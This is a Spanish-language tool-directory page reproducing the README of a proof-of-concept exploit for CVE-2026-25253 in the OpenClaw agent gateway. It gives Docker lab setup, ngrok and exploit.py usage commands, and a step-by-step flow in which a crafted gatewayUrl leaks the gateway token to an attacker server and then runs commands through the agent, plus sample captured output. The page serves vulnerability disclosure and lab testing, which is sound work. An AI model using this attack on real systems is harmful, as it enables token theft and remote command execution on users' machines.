Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-25253 — Prueba de concepto de exploit para CVE-2026-25253 en OpenClaw: un gatewayUrl manipulado exfiltra el token de gateway de la Control UI, lo que permite acceso no autorizado al gateway y ejecución remota de código con 1 clic. | Kitploit
Herramientas/GitHubGitHub/yym8538/cve-2026-25253
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosSeguridad WebPruebas de PenetraciónAutenticaciónRed TeamingHerramienta de Acceso Remoto
GitHubyym8538/cve-2026-25253

CVE-2026-25253

Prueba de concepto de exploit para CVE-2026-25253 en OpenClaw: un gatewayUrl manipulado exfiltra el token de gateway de la Control UI, lo que permite acceso no autorizado al gateway y ejecución remota de código con 1 clic.

1hace 1 mesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25253 OpenClaw RCE de 1 clic

★ CVE-2026-25253 OpenClaw Ejecución Remota de Código de 1 clic PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descripción

CVE-2026-25253 : Vulnerabilidad de Exfiltración de Token de Autenticación de OpenClaw

descripción: OpenClaw (también conocido como clawdbot o Moltbot) anterior a v2026.1.29 permite a los atacantes exfiltrar un token de autenticación de gateway almacenado proporcionando un valor de cadena de consulta gatewayUrl manipulado a la Control UI, que establece automáticamente una conexión WebSocket sin validación ni confirmación del usuario. Esto puede provocar acceso no autorizado al gateway y ejecución remota de código de 1 clic.

Requisitos

  • Docker (Docker Desktop en Windows)
  • Python 3.x (lado del atacante)

Archivos

  • Dockerfile — construye el entorno vulnerable de OpenClaw
  • templates/ — páginas web maliciosas utilizadas por el exploit
  • config.txt — configuración de OpenClaw utilizada en el entorno de la víctima
  • exploit.py — servidor de exploit
  • requirements.txt — dependencias del PoC

Configuración del Entorno

  1. Construir la imagen Docker
docker build -t openclaw-vuln .
  1. Ejecutar el entorno (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Crear túnel SSH
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Contraseña: openclawlab
  1. Acceder a la Control UI de OpenClaw Abrir la siguiente URL en el navegador
http://127.0.0.1:18789/
  1. Introducir el Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Hacer clic en Connect
  3. Abrir la pestaña Config
  4. pegar el contenido de config.txt
  5. Reemplazar el campo de la API key con tu OpenAI API key
  6. Guardar la configuración
  7. Confirmar que el agente responde con normalidad

Prueba de Concepto (PoC)

  1. Instalar dependencias (lado del atacante)
pip3 install -r requirements.txt
  1. Exponer el servidor de exploit sobre HTTPS
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copiar el hostname de reenvío generado
  1. Ejecutar el servidor de exploit
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Ejemplo:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Desencadenar el ataque
  1. Abrir la página maliciosa expuesta por el servidor de exploit
  2. Simular la interacción de la víctima con la página
  3. Desencadenar el flujo del exploit desde el navegador

Flujo del Ataque

  1. Una URL maliciosa cambia el gatewayUrl de la Control UI de la víctima
  2. El navegador se conecta automáticamente al endpoint WebSocket controlado por el atacante
  3. El token de autenticación del gateway se filtra al atacante
  4. La página maliciosa utiliza el token robado para abrir una nueva conexión WebSocket al gateway local de OpenClaw de la víctima
  5. Se envía una solicitud de ejecución de comando a través del agente
  6. El resultado de la ejecución se devuelve al servidor del atacante

Resultado Esperado

  • El navegador de la víctima es redirigido al flujo WebSocket malicioso
  • El token de autenticación del gateway es capturado por el atacante
  • El atacante puede enviar una solicitud de ejecución de comando a través de OpenClaw
  • La salida del comando se devuelve al servidor del atacante

Salida de Ejemplo

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Notas

  • Este PoC está dirigido a OpenClaw 2026.1.24-1
  • La cadena de exploit se basa en el manejo vulnerable de gatewayUrl en la Control UI
  • Para el acceso remoto a la víctima, la página maliciosa debe servirse sobre HTTPS
  • Se accede al gateway local de OpenClaw a través del navegador de la víctima como puente

EQST Insight

Publicamos análisis de CVE y malware una vez al mes. Si estás interesado, sigue los enlaces a continuación para consultar nuestras publicaciones.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Descargar herramienta